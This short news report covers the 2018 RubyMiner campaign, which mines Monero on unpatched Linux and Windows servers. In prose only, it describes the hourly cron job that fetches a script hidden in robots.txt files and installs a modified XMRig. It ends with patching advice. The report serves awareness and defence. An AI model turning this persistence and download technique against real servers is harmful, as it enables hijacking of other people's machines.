Researchers at Check Point and Certego have discovered a new version of malware for servers running Linux and Windows. RubyMiner is a Monero crypto currency miner, designed to attack outdated servers. Attacks with its use began on January 9th, 2018.
Researchers noted a number of distinctive features of attacks using RubyMiner. The exploit code contains a series of shell commands; Attackers added a new job to cron, performed every hour (hourly); Every hour cron loads a script hosted online; the downloaded script is located in the robots.txt file on different domains; then the script loads and installs a modified version of the legitimate XMRig application for the Montero crypto currency.
According to Check Point, RubyMiner has already infected about 700 servers. In the loadable malware of the customized version of XMRig, the researchers found the address of the crypto-currency purse. Judging by it, the operators have already managed to earn $ 540 for their efforts..
Cron is a classic daemon used to periodically perform tasks at a specific time.Regular actions are described by instructions placed in crontab files and in special directories.
Cryptocurrency mining using someone elses equipment is not a new idea, but it is always a good idea to make sure all your technical hardware runs up to date with the latest security patches.